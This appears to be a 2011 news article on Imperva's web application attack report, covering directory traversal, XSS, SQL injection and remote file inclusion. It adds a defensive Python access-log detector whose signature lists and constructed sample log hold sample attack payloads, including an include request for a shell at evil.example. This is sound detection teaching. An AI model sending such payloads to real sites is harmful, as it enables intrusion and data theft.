Wrong. We are all at risk, according to the fittingly titled study, WAAR, or the Web Application Attack Report from data security company Imperva.
The first half of 2011 was big for web-based attacks. Breaches such as the Sony Playstation Network, which shut the network down for nearly a month this spring, made headlines for weeks. But Imperva believes focusing on high-profile cases can actually be a detriment to smaller sites.
“Nobody’s looking at what’s really being attacked,” Noa Bar Yosef, senior security strategist for Imperva’s Hacker Intelligence Initiative told VentureBeat. “Hackers are taking the path of least resistance.”
According to WAAR, hackers are “equal opportunity offenders,” and attacks are widespread. Imperva reports that web applications of all sizes are attacked on average once every two minutes, and roughly seven times per second at the peak of an attack campaign. The goal is simple and doesn’t require an enterprise-size database to succeed: the criminals just need to steal your data and sell it on the black market.
Automated attacks allow hackers to be prolific in this task. Between December 2010 and May 2011, Imperva identified four main automated avenues hackers use in attacks. These include:
- Directory Traversal: The attacker manipulates a file-path parameter (typically with `../` sequences) so the application reads files outside the web root, such as configuration files or password files. It exploits the application’s failure to validate the path, not a defect in the web server itself.
- Cross-Site Scripting: The attacker injects script into a page the site serves to other users, so the script runs in the visitors’ browsers under the site’s origin. Typical payloads steal session cookies or silently redirect visitors to malware.
- SQL Injection: The attacker places SQL syntax into an input that the application concatenates into a database query, letting them read or modify the database. On a weakly configured server the same hole can be used to write files or run commands, giving the attacker a way back in later.
- Remote File Inclusion: The attacker supplies a URL in a parameter that the application passes to an include or require call, so the server fetches and executes attacker-hosted code.
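Because these four attacks are automated and noisy, the cheapest place to spot them is the web server’s own access log. The following detector is an added example written for this page, not code from Imperva or the WAAR: it parses Apache/nginx combined-format log lines, percent-decodes the request path repeatedly so double-encoded payloads cannot slip past the patterns, and tags each request with the attack classes it matches. The log lines and the signature set are constructed for illustration and are deliberately small.

```python
"""Tag access-log requests with the four automated attack classes above.

Added example for this page; the patterns are illustrative and far from a
complete WAF rule set. Sample log lines below are constructed, not real.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Apache/nginx "combined" log format: client IP, timestamp, request line,
# status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# One small signature list per attack class (illustrative, not exhaustive).
SIGNATURES = {
    "directory_traversal": [
        r"\.\./", r"\.\.\\", r"/etc/passwd", r"/proc/self/", r"\\windows\\",
    ],
    "xss": [
        r"<script", r"javascript:", r"<iframe", r"<img[^>]+src",
        r"\bon(?:error|load|mouseover|click)\s*=",
    ],
    "sqli": [
        r"\bunion\b[\s/*]+(?:all\s+)?select\b",
        r"'\s*or\s+'?\d+'?\s*=\s*'?\d+",
        r"\bsleep\s*\(", r"\bbenchmark\s*\(", r"';\s*drop\s+table",
        r"(?:--|#|/\*)\s*$",
    ],
    "rfi": [
        r"=\s*(?:https?|ftp)://", r"=\s*php://", r"=\s*data:",
    ],
}
COMPILED = {
    cat: [re.compile(p, re.IGNORECASE) for p in pats]
    for cat, pats in SIGNATURES.items()
}


def normalize(raw, max_rounds=3):
    """Percent-decode repeatedly (bounded) so %252e%252e%252f becomes ../
    before matching. '+' is treated as a space as in form encoding."""
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("+", " ")


def classify_request(path):
    """Return the set of attack classes whose signatures match the path."""
    text = normalize(path)
    return {cat for cat, pats in COMPILED.items()
            if any(p.search(text) for p in pats)}


def scan_log(lines):
    """Parse combined-format lines and return one finding per flagged request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not combined format; skip rather than guess
        cats = classify_request(m.group("path"))
        if cats:
            findings.append({
                "ip": m.group("ip"),
                "path": m.group("path"),
                "ua": m.group("ua"),
                "categories": sorted(cats),
            })
    return findings


def summarize(findings):
    """Count findings per attack class."""
    counts = Counter()
    for f in findings:
        counts.update(f["categories"])
    return dict(counts)


# Constructed sample log: four attack classes, one double-encoded traversal,
# one tautology SQLi, and one benign request.
SAMPLE_LOG = [
    '10.0.0.1 - - [12/May/2011:10:00:01 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.2 - - [12/May/2011:10:00:02 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.3 - - [12/May/2011:10:00:03 +0000] "GET /product?id=1%27%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1" 500 0 "-" "sqlmap/1.0"',
    '10.0.0.4 - - [12/May/2011:10:00:04 +0000] "GET /index.php?include=http://evil.example/shell.txt HTTP/1.1" 200 200 "-" "libwww-perl/5.8"',
    '10.0.0.5 - - [12/May/2011:10:00:05 +0000] "GET /about.html HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [12/May/2011:10:00:06 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/May/2011:10:00:07 +0000] "GET /cart?item=1%27%20OR%20%271%27=%271 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for r in results:
        print(r["ip"], r["categories"], r["path"])
    print(summarize(results))
```

Two caveats worth keeping in mind when adapting this. First, the RFI pattern `=http://` will also fire on legitimate redirect or callback parameters, so in production you would scope it to the parameters that actually reach include calls. Second, a real WAF normalizes far more than percent-encoding (UTF-8 overlong sequences, HTML entities, SQL comment stuffing); the bounded decode loop here shows the idea but not the full set.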
These automated attacks let hackers play what the WAAR calls a game of “hide and seek”: quietly harvesting data and selling it on. According to the WAAR, online forums let hackers trade that data with little visibility. The report shows a listing offering “full site/admin control” of the U.S. Army CECOM (Communications-Electronics Command) site for $499.
When a company or organization secures its websites, often only the specific vulnerabilities that have already been identified get patched, which protects against only one or two of the automated avenues above. LulzSec shows why this is dangerous. The group used not one but three of them in its widely covered attacks: cross-site scripting, SQL injection and remote file inclusion. Patching a single hole does little to stop a determined attacker who simply moves to the next one.
“We need to learn from LulzSec,” Bar Yosef said. “LulzSec are hacktivists. [They are] using the same kind of attack for change.” Groups motivated by a cause tend to push these techniques to their limits. The U.S. government has already begun to define rules of conduct for cyber warfare. Watching groups like LulzSec, which has already attacked U.S. government sites, may offer insight into where sophisticated hacking is heading and how far attackers will go.
Download the full report here.